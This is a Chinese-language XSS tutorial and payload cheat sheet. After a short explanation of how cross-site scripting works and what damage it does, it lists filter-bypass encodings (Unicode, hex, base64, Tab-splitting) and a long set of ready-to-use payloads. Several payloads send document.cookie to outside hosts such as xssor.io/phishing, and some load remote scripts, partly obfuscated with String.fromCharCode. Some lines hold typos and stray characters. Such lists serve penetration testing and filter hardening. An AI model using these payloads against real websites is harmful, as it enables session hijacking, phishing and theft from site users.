XSS漏洞的原理
XSS漏洞是发生在目标网站中目标用户的浏览层面上,当用户浏览器渲染整个HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就会发生。
XSS漏洞的危害
- 获取用户或者管理员的Cookie
- XSS蠕虫
- 钓鱼攻击
- 挂马
- 键盘记录等
以下是可能嵌入跨源的资源的一些示例:
- <script src="..."></script> 标签嵌入跨域脚本。语法错误信息只能在同浪脚本中捕
- <link rel="stylesheet" href="...">标签嵌入CSS。由于CSS的松散的语法规
则,CSS的跨域需要一个设置正确的 Content-Type消息头。不同浏览器有不同的限
制:IE, Firefox, Chrome, Safari(跳至CVE-2010-0051)部分和 Opera - <img>嵌入图片。支持的图片格式包括PNG,JPEG,GlF,BMP,SVG,
- <video>和<audio>嵌入多媒体资源。
- <object>,<embed>和<applet>的插件
- @font-face引入的字体。一些浏览器允许跨域字体( cross-origin fonts),一些需要同
源字体( same-origin fonts) - <frame>和<iframe>载入的任何资源。站点可以使用 X-frame-optionsi消息头来阻止这
种形式的跨域交互。 - <svg> 标签中可直接执行实体字符
伪协议
伪协议不同于因特网上所真实存在的协议,如http://,https://,ftp://,而是为关联应用程序而使用的。如:tencent://(关联QQ),data:(用base64编码来在浏览器端输出二进制文件),还有就是javascript:[code]我们可以在浏览地址栏里输入"javascript:alert('JS!');",点转到后会发现,实际上是把javascript: 后面的代码当JavaScript来执行,并将结果值返回给当前页面。(XSS Changes Stage #8)
通常只有引用文件的属性才能触发跨站脚本
href=
lowsrc=
bgsound=
background=
value=
action=
dynsrc=
HTML 事件
JavaScript 与 HTML 之间的交互是通过事件来实现的,事件是用户或浏览器自身执行的某种动作,比如 click,mouseover,load 等,响应事件的函数叫事件处理函数(或事件侦听器)。
例如:<img src="#" onerror=alert(/xss/)>ux
可用来测试事件型的跨站脚本的事件
onResume onReverse onRowDelete onRowInserted onSeek onSynchRestored
onTimeError onTrackChange onURLFlip onMediaComplete onerrorupdate onrowenter
.......
XSS 绕过
- 基于黑名单绕过 JavaScript 敏感字段
可利用空格,回车和 TAB 键进行绕过
<img src="javas cript:alert(/xss/)">
注:javas 与 cript 之间不是空格,是Tab键,同时也可用回车符进行拆分关键字
- Unicode编码绕过
<img src="x" onerror="alert("xss");">
<img src="x" onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">
- url 编码绕过
<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
- Ascii码绕过
<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">
- hex绕过
<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
- 八进制
<img src=x onerror=alert('\170\163\163')>
- base64绕过
<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
- 过滤()圆括号
可以使用反引号代替圆括号
<img src=x onerror=alert`1`>
引入伪协议,以及location,然后进行编码拆分。
<img src=1 onerror=alert%28%29>
<img src=1 onerror=location="javascript:"+"aler"+"t%281%29">
XSS 常用 payload
>"'
'';!--"<XSS>=&{()}
'';!--"<script>alert(0);</script>=&{()}
'';!--"<script>alert(0);</script>=&{(alert(1))}
`><script>alert(0)</script>
<script>a=eval;b=alert;a(b(/i/.source));</script>
<code onmouseover=a=eval;b=alert;a(b(/g/.source));>HI</code>
<script src=http://xssor.io/xss.js></SCRIPT>
<script>location.href='http://127.0.0.1:8088/cookie.php?cookie='+escape(document.cookie);</script>
'"><img onerror=alert(0) src=><"'
<img src=http://127.0.0.1/myspace.asp>
<img src=jav ascr	ipt:al ert(0)>
<img src=jav ascr	ipt:i="x=document.createElement('script');x.src='http://xssor.io/xn.js';x.defer=true;document.getElementsByTagName('head')[0].appendChild(x)";execScript(i)>
<img src=jav ascr	ipt:i="x=docu ment.createElement('\u0053\u0043\u0052\u0049\u0050\u0054');x.src='http://xssor.io/xn.js';x.defer=true;doc ument.getElementsByTagName('head')[0].appendChild(x)";execScri pt(i)>
new Image().src="http://xssor.io/phishing/cookie.asp?cookie="+escape(document.cookie);
<iframe src=http://www.baidu.com/></iframe>
<body background=javascript:alert(/xss/)></body>
body{xxx:expression(eval(String.fromCharCode(105,102,40,33,119,105,110,100,111,119,46,120,41,123,97,108,101,114,116,40,39,120,115,115,39,41,59,119,105,110,100,111,119,46,120,61,49,59,125)))}
<style>body{width:expression(parent.document.write(unescape('%3Cscript%20src%3Dhttp%3A//xssor.io/phishing/%3E%3C/script%3E')));}</style>
a{xxx:expression(if(!window.x){alert('xss');window.x=1;})}
a{xxx:\65\78\70\72\65\73\73\69\6f\6e\28\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\27\78\73\73\27\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\3b\7d\29}
body{background:url("javascript:alert('xss')")}
body{background:url(JavAs cr
ipt:alert(0))}
<style>@im\port'\ja\vasc\ript:alert("xss")';</style>
@i\6d\70o\72\74'javascr\ipt:alert(document.cookie)';
<div style=xss:expres\sion(if(!window.x){alert('xss');window.x=1;})></div>
alert(String(/xss/).substr(1,3))
alert(/xss/.source)
<a onclick="i=createElement('iframe');i.src='javascript:alert(/xss/)';x=parentNode;x.appendChild(i);" href="#">Test</a>
x='\x61\x6c\x65\x72\x74\x28\x31\x29';new Function(x)()
<a href="javascript:alert(1)">Test</a>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4=">Test</a>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<div style="-moz-binding:url(http://xssor.io/0.xml#xss);x:expression((window.r!=1)?eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,119,119,119,46,48,120,51,55,46,99,111,109,47,48,46,106,115));document.getElementById(x(105,110,106,101,99,116)).appendChild(scr);window.r=1;'):1);"id="inject">
javascript:document.scripts[0].src='http://127.0.0.1/yy.js';void(0);
<a href="javascript:x=open('http://www.xiaonei.com/');setInterval (function(){try{x.frames[0].location={toString:function(){return%20'http://xssor.io/Project/poc/docshell.html';}}}catch(e){}},3000);void(1);">Test</a>
<script/onreadystatechange=alert(1)>
<script/src=data:text/javascript,alert(4)></script>
javascript:document.cookie=window.prompt("edit cookie:",document.cookie);void(0);
<input id=11 name=s value=`aa`onclick=alert(/xss/)>
<input value:aa/onclick=alert(/xss/)>
<li style=list-style:url() onerror=alert(1)>
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,alert(1)//#">XXX</a></body>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
[!] ie only:
<div style=width:1px;filter:glow onfilterchange=alert(1)>x
<title onpropertychange=alert(1)></title><title title=>
<!--[if]><script>alert(1)</script --> <!--[if<img src=x onerror=alert(1)//]> -->
[!] parsing error:
<!--<img src="--><img src=x onerror=alert(1)//">
<comment><img src="</comment><img src=x onerror=alert(1))//">
<![><img src="]><img src=x onerror=alert(1)//">
<style><img src="</style><img src=x onerror=alert(1)//">
<b <script>alert(1)</script>0
<x '="foo"><x foo='><img src=x onerror=alert(1)//'>
[!] special tags parsing issues, from: http://html5sec.org/#html
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<? foo="><x foo='?><script>alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
<% foo><x foo="%><script>alert(1)</script>">
[!] fuzzing tips:
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<a href=javascript:alert(1)>XXX</a>
[!] utf-7 bom
+/v8
+/v9
+/v+
+/v/
[!] html5sec.org
<svg/onload=alert(1)>
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
<video><source onerror="alert(1)">
<iframe srcdoc="<svg onload=alert(1)>⃒"></iframe>
<frameset onload=alert(1)>
<!--<img src="--><img src=x onerror=alert(1)//">
<style><img src="</style><img src=x onerror=alert(1)//">
<title><img src="</title><img src=x onerror=alert(1)//"> // by evilcos
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<frameset onpageshow="alert(1)">
<body onpageshow="alert(1)">
<script>`</div><div>`-alert(123)</script>
<script>`</div><div>`+alert(123)</script>
<script>`</div><div>`/alert(123)</script>
<script>`</div><div>`%alert(123)</script>
<script>`</div><div>`==alert(123)</script>
<script>`</div><div>`/=alert(123)</script> # Only Edge
<script>`</div><div>`*=alert(123)</script> # Only Edge
<img/src=="x onerror=alert(1)//">
<div/style=="x onclick=alert(1)//">XSS'OR
<div style=behavior:url(" onclick=alert(1)//">XSS'OR
<div style=x:x(" onclick=alert(1)//">XSS'OR
<div> <a href=/**/alert(1)>XSS</a><base href="javascript:\ </div><div id="x"></div>
<div><base href="javascript:/"><a href=/**/alert(1)>XSS</a></div>
<div><base href="javascript:\"><a href=/**/alert(1)>XSS</a></div>
<div><base/href=javascript:/><a href=/*'"+-/%~.,()^&$#@!*/alert(1)>XSS</a></div>
<noembed><img src="</noembed><iframe onload=alert(1)>" /></noembed>
